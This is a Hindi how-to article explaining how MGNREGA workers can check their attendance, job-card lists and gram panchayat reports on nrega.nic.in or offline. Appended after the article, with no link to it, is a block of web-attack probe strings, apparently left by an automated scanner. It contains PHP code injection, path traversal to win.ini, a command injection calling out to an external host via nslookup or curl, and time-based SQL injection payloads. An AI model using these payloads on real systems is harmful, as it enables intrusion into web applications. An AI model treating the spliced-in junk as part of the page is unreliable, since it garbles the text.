MGNREGA Attendance: मनरेगा हाजिरी, या महात्मा गांधी राष्ट्रीय ग्रामीण रोजगार गारंटी अधिनियम (मनरेगा) के तहत नरेगा हाजिरी, किसी भी मनरेगा मजदूर द्वारा नरेगा योजना में किये गए काम के दिनों के लिए हाजिरी लगाई जाती है। मजदूर द्वारा मनरेगा के तहत किए गए कार्य की मात्रा और गुणवत्ता के आधार पर ही उन्हें वेतन दिया जाता है। मनरेगा हाजिरी के आधार पर, मजदूरों को उनके काम के लिए मजदूरी का भुगतान भी किया जाता है। ग्रामीण विकास मंत्रालय, भारत सरकार द्वारा शुरू की गई नरेगा योजना के तहत ग्रामीण क्षेत्रों के मजदूरों को रोजगार दिया जाता हैं।
मनरेगा कार्यक्रम का उद्देश्य ग्रामीण क्षेत्रों में रोजगार की गारंटी देना है और गरीब और मजदूर वर्ग को आर्थिक रूप से सुरक्षित करना है। इसके तहत कई प्रकार के काम किए जाते हैं, जैसे की सड़क निर्माण, जल संचालन, जलसरण, और बुनाई आदि। मनरेगा मजदूरों को उनकी नरेगा हाजिरी के अनुसार ही मजदूरी का भुगतान किया जाता हैं। इसीलिए केंद्र सरकार द्वारा नरेगा मजदूरों को अपनी हाजिरी को ऑनलाइन चेक करने की सुविधा दी गई हैं। इस MGNREGA Attendance आर्टिकल में हम आपको मनरेगा हाजिरी ऑनलाइन कैसे चेक करें? के बारे में विस्तार से जानकारी दे रहे हैं।
MGNREGA Attendance ( मनरेगा हाजिरी )
MGNREGA Attendance ( मनरेगा हाजिरी ) महात्मा गांधी राष्ट्रीय ग्रामीण रोजगार गारंटी अधिनियम (मनरेगा) के तहत, प्रत्येक मजदूर को अपने मजदूरी के प्रतिदिन की हाजिरी लगानी होती है। मनरेगा हाजिरी ( mgnrega attendance ) चढ़ाना महत्वपूर्ण है, क्यूंकि मजदूर द्वारा मनरेगा के तहत किए गए कार्य दिनों को प्रमाणित करता है और इसी के अनुसार मजदूरी का भुगतान भी मजदूर को किया जाता हैं। नरेगा हाजिरी के आधार पर ही मजदूरों को उनके द्वारा किये गए काम के लिए मजदूरी का भुगतान भी किया जाता है। मनरेगा योजना के अंतर्गत नागरिकों को 100 दिवस का रोजगार दिया जाता हैं।
नरेगा श्रमिकों को अपनी हाजिरी चेक करने , जॉब कार्ड , नरेगा मजदूर का पैसा आदि चेक करने की सुविधा देने के लिए सरकार द्वारा नरेगा पोर्टल लांच किया गया हैं। mgnrega attendance app के द्वारा भी आप आसानी से मनरेगा अटेंडेंस ( mgnrega attendance check ) कर सकते हैं। मनरेगा के अंतर्गत कार्य करने वाले मजदूरों की मनरेगा हाजिरी प्रतिदिन इस पोर्टल पर दर्ज़ की जाती हैं। mgnrega attendance list के अनुसार सभी राज्यों में नरेगा मजदूरी का भुगतान एक समान नहीं किया जाता हैं।
यदि आप नरेगा योजना के लाभार्थी है और आप नरेगा हाजिरी चेक करना चाहते हैं तो मनरेगा हाजिरी चेक करने की ऑनलाइन और ऑफलाइन प्रोसेस इस आर्टिकल में आप आसानी से जान पाएंगे। यदि आप mgnrega attendance online चेक करना चाहते हैं तो इसके लिए आपको मनरेगा की ऑफिसियल वेबसाइट पर जाना होगा।
MGNREGA Attendance Online Check
मैं अपनी नरेगा उपस्थिति रिपोर्ट कैसे चेक करूं? ग्रामीण विकास मंत्रालय, भारत सरकार द्वारा मनरेगा से जुड़े श्रमिकों को उनके काम का समय पर भुगतान करने के लिए मनरेगा ( nrega attendance app ) की आधिकारिक वेबसाइट लॉन्च की गई है। जिसके माध्यम से नरेगा श्रमिक घर बैठे ही अपनी हाजिरी ऑनलाइन चेक ( nrega attendance check ) कर सकते हैं। MGNREGA योजना के अंतर्गत देश के ग्रामीण क्षेत्रों में रहने वाले अकुशल श्रमिकों को 100 दिन का रोजगार की गारंटी प्रदान की गई है।
इसलिए ऐसी स्थिति में मनरेगा जॉब कार्ड धारक आधिकारिक वेबसाइट पर अपनी मनरेगा हाजिरी ऑनलाइन चेक कर सकते हैं। मनरेगा श्रमिकों के लिए मनरेगा उपस्थिति को आधिकारिक वेबसाइट पर उपलब्ध कराया जाता है ताकि वे बिना किसी परेशानी के अपनी नरेगा हाजिरी को ऑनलाइन चेक कर सकें।
How to check nrega attendance?
NREGA Attendance check: नरेगा हाजिरी चेक करने के लिए आपको नरेगा पोर्टल पर जाना होगा। इस पोर्टल के होमपेज पर आपको एनएमएमएस ऐप उपस्थिति देखें (nmms nrega attendance) के विकल्प पर क्लिक करें। अब अपना राज्य इस ड्राप डाउन लिस्ट में से राज्य का नाम चुने। Select Attendance Date: अब उस तारीख का चयन करे, जिस दिन की nrega attendance check करना चाहते हैं। इसके बाद Show Attendance के बटन पर क्लिक करें। अब आपके सामने आपके राज्य का नाम खुल जायेगा, जिसके बाद अपने राज्य के नाम पर क्लिक करें।
अब आपके सामने आपके राज्य के सभी जिलों के नाम आ जायेंगे। जिसके बाद आपको उस जिले के नाम पर क्लिक करना है जहां आप काम करते हैं। अब उस जिले के Blocks की सूची आ जाएगी, जिसमें आप अपना ब्लॉक सेलेक्ट करें। इतना सब करने के बाद अब आपके गांव के नाम की सूची आ जाएगी। इस सूची में से अपने गांव के नाम पर क्लिक करके आप अपनी नरेगा अटेंडेंस (nrega attendance) चेक कर सकते हैं।
MGNREGA Attendance kaise check kare
NREGA Attendance check: नरेगा ऑनलाइन पोर्टल के माध्यम से NREGA attendance list चेक करना बहुत ही आसान हैं। नरेगा अटेंडेंस चेक करना के लिए निम्न प्रक्रिया को फॉलो करें-
स्टेप- 01. NREGA attendance check website
MGNREGA attendance list ऑनलाइन देखने के लिए सबसे पहले नरेगा अटेंडेंस की ऑफिसियल वेबसाइट- nrega.nic.in को अपने मोबाइल अथवा कंप्यूटर ब्राउज़र में ओपन करें। और इसके होमपेज पर निम्न ऑप्शन को देखें।
स्टेप- 02. एनएमएमएस ऐप उपस्थिति देखें
MGNREGA daily attendance देखने के लिए ‘एनएमएमएस ऐप उपस्थिति देखें’ ( NMMS App ) के विकल्प पर क्लिक करें और आगे मांगी गई जानकारी को चुने। इसके माध्यम से आप नरेगा मजदूर की nrega attendance check और mgnrega nmms attendance जो NMMS App से ली गयी थी, ऑनलाइन चेक कर सकते हैं।
स्टेप- 03. राज्य और दिनांक चुने
अब आप इस ड्राप-डाउन लिस्ट में से अपने राज्य का नाम चुने और वह तारीख सेलेक्ट करें, जिस दिन की नरेगा हाजिरी ( nrega attendance ) चेक करना चाहते हैं। यह दोनों विकल्प सेलेक्ट करके ‘Show Attendance’ बटन पर क्लिक करें। जिसके बाद आपके राज्य की मस्टर रोल संख्या और काम की संख्या की एक सूची आपके सामने आ जाएगी। इस सूची में आप राज्य के नाम पर क्लिक करें।
स्टेप- 04. जिला, ब्लॉक, और गांव चुने
राज्य की सूची के बाद आपके जिले की जानकारी आएगी उसमें से अपने जिले के नाम पर क्लिक करें और फिर अपने ब्लॉक के नाम को चुने। इसके बाद आपके सामने आपके ब्लॉक के सभी गांवों की नरेगा अटेंडेंस की सूची आ जाएगी। इस नरेगा हाजिरी लिस्ट में से अपने गांव का नाम सलेक्ट करें।
स्टेप- 05. NREGA Attendance list
अपने गांव के नाम पर क्लिक करने के बाद आपके सामने नरेगा अटेंडेंस की लिस्ट खुल जाएगी। जिसमें आप अपना और किसी अन्य नरेगा मजदूर की नरेगा हाजिरी ऑनलाइन ( nrega attendance online check ) चेक कर सकते हैं। इस नरेगा हाजिरी सूची ( nrega attendance list ) में आप मजदूर का जॉब कार्ड नंबर , मजदूर का नाम , अटेंडेंस दिनांक , और मनरेगा मजदूर की उपस्थिति चेक कर सकते हैं।
मनरेगा की आधिकारिक वेबसाइट, nrega.nic.in पर जाकर, अपने जॉब कार्ड नंबर और आधार नंबर का उपयोग करके अपनी हाजिरी चेक कर सकते है। मनरेगा हाजिरी ऑफलाइन भी चेक कर सकते है। नरेगा हाजिरी ऑफलाइन देखने के लिए आप अपने ग्राम पंचायत कार्यालय में जाकर, अपने जॉब कार्ड और आधार कार्ड दिखाकर अपनी नरेगा हाजिरी चेक कर सकते है। मनरेगा हाजिरी में मजदूर का नाम, जॉब कार्ड नंबर, आधार नंबर, कार्य की तिथि, कार्य का समय, कार्य की मात्रा, और कार्य की गुणवत्ता दिखाई देती हैं।
How to Check MGNREGA Attendance Online
यदि आपके पास मनरेगा मजदूर का जॉब कार्ड है तो आप आसानी से मनरेगा हाजिरी ऑनलाइन चेक कर सकते हैं। मनरेगा अटेंडेंस ऑनलाइन चेक करने के लिए सबसे पहले नरेगा की ऑफिसियल वेबसाइट nrega.nic.in पर जाये। अब नरेगा के अंतगर्त कार्यरत मजदूर के राज्य और जिला का चयन करें। अब अपने ब्लॉक और गांव का नाम दी गयी सूची में से सेलेक्ट करें। इसके बाद मनरेगा मजदूर की अटेंडेंस लिस्ट खुल जाएगी। इस मनरेगा अटेंडेंस लिस्ट में आप अपना नाम चेक कर सकते हैं।
NREGA Gram Panchayat List कैसे देखें?
यदि आप मनरेगा के तहत काम करने वाले नरेगा मजदूर हैं और NREGA Gram Panchayat List देखना चाहते हैं तो आप नीचे बताए गए आसान स्टेप्स को फॉलो करके नरेगा लिस्ट देख सकते हैं-
स्टेप- 01. सबसे पहले नरेगा ऑफिसियल वेबसाइट nrega.nic.in पर जाएँ।
स्टेप- 02. अब होमपेज पर ‘Quick Access’ के बटन पर क्लिक करना हैं।
स्टेप- 03. अब एक पॉपअप आएगा जिसमें “Panchayats GP/PS/ZP Login” विकल्प पर क्लिक करें।
स्टेप- 04. अब “Gram Panchayats” के ऑप्शन को सेलेक्ट करें।
स्टेप- 05. अब ग्राम पंचायत के अंडर “Generate Reports” पर क्लिक करें। जिसके बाद आपके सामने देश के सभी राज्यों की सूची आपके सामने खुल जाएगी। इस लिस्ट में से अपने राज्य के नाम पर क्लिक करें।
स्टेप- 06. अब इसके बाद आपको फाइनेंसियल वर्ष, जिला, ब्लॉक,और ग्राम पंचायत NREGA सेलेक्ट करके ‘Proceed’ बटन पर क्लिक करें। इसके बाद आपके सामने ग्राम पंचायत की रिपोर्ट्स देखने के विकल्प खुल जायेंगे।
स्टेप- 07. अब R1.Job Card/Registration सेक्शन के अंतर्गत “Job card/Employment Register” पर क्लिक करें।
इस पर क्लिक करने के बाद आपके ग्राम पंचायत की NREGA Panchayat लिस्ट खुल जाएगी। इस लिस्ट में आपका जॉबकार्ड नंबर और आपका नाम आएगा। आप अपनी मनरेगा हाजिरी प्रतिदिन चेक करें ताकि आपको किसी भी गलती का पता चलजायेगा। यदि आपको अपनी नरेगा हाजिरी में कोई गलत जानकारी या अनुपस्थिति दिखाई देती है, तो तुरंत अपने ग्राम पंचायत सचिव या रोजगार सहायक से सम्पर्क करें। अपनी हाजिरी को सुरक्षित रखने के लिए अपने जॉबकार्ड में आप नियमित रूप से एंट्री करें ताकि आवश्यकता पड़ने पर आप इसका उपयोग कर सकें।
555
555
${@print(md5(31337))}
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
`(nslookup -q=cname hitorqjxrhznk63092.bxss.me||curl hitorqjxrhznk63092.bxss.me)`
J8SQaqz8
-1 OR 2+471-471-1=0+0+0+1
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1 waitfor delay ‘0:0:15’ —
bknYlNak’; waitfor delay ‘0:0:15’ —
-5) OR 31=(SELECT 31 FROM PG_SLEEP(15))–
ysQRTurQ’ OR 997=(SELECT 997 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1′”
555